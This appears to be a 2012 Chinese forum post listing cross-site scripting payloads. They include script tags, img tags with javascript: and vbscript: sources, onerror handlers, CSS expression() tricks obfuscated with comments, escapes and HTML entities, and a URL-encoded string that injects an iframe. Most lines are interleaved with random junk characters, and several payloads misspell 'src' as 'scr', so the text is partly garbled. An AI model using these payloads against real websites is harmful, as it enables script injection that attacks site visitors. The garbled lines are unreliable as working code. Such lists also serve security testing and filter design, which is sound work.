<script>alert("跨站")</script> (最常用), e) t3 g& M- [+ T8 D$ C# L4 l
<img scr=javascript:alert("跨站")></img>
2 u4 E3 X4 T6 b4 P& N<img scr="javascript: alert(/跨站/)></img>
8 M% u9 t- y4 S. n% ~/ U<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
1 N0 H' \3 Y, z: B6 d1 x- ?- S% n<img scr="#" onerror=alert(/跨站/)></img>
" k& d$ K( V1 j<img scr="#" style="xss:expression(alert(/xss/));"></img>3 d* L1 X' C9 _* c
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
$ q9 y$ b1 o+ Q* W, R& u<img src=vbscript:msgbox ("xss")></img>
9 }1 v1 }! b& a# N; b6 l2 j<style> input {left:expression (alert('xss'))}</style>/ U* N+ k( e1 c$ }/ m" S
<div style={left:expression (alert('xss'))}></div>9 R3 Y4 O8 J& I* N5 G/ \* o
<div style={left:exp/* */ression (alert('xss'))}></div>
+ G4 d2 I& z0 v* T4 g" G<div style={left:\0065\0078ression (alert('xss'))}></div>- ~9 D1 `* j: l$ x7 N5 O
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
& `5 x `+ K0 bunicode <div style="{left:expRessioN (alert('xss'))}">$ _) f8 m( n0 `7 { O/ A; D
* E% \& {2 h. j# `- o8 h% u
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
$ T. f9 E7 X0 a' x" C |
发表于 2012-9-15 14:09:13
收藏
支持
反对